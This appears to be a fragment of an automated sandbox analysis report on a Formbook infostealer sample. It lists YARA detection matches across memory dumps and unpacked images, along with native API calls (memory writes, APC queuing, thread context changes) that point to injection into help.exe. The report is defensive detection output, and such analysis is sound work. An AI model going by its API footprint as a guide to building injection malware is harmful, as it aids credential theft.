          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004182AC NtReadFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F8260 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F82E0 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F82AC NtReadFile,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DB284
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DC2D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D99B0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DDF9B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BE0E8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BD240
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BDAE8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BADF8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BAE08
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B8B1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B963
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00408C50
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B493
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B496
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041C539
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00402D89
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041CE85
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041BF12
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041C795
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186F900
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B090
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019320A8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019328EC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921002
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193E824
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189EBB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192DBD2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019203DA
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01932B28
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019322AE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191FA2B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019325DD
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187D5E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01932D07
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01860D20
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01931D55
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187841F
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192D466
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193DFCE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01931FF1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01932EF7
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192D616
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01886E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A92B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A922AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A920A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB090
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A928EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A81002
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A91FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A92EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A925DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A92D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A91D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB954
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB8B1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FBF12
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E2FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FC795
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FCE85
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FC539
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E2D89
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E2D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E8C4B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E8C50
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB496
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB493
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: String function: 0186B150 appears 45 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 039CB150 appears 35 times
          Source: SKlGhwkzTi.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SKlGhwkzTi.exeBinary or memory string: OriginalFilename vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.691758486.0000000008C10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.678186974.0000000000942000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapOption.exe. vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.691169517.0000000007480000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exeBinary or memory string: OriginalFilename vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000004.00000002.764137531.000000000195F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000004.00000002.761811924.0000000000E02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapOption.exe. vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000004.00000002.763603378.00000000015A9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exeBinary or memory string: OriginalFilenameSoapOption.exe. vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
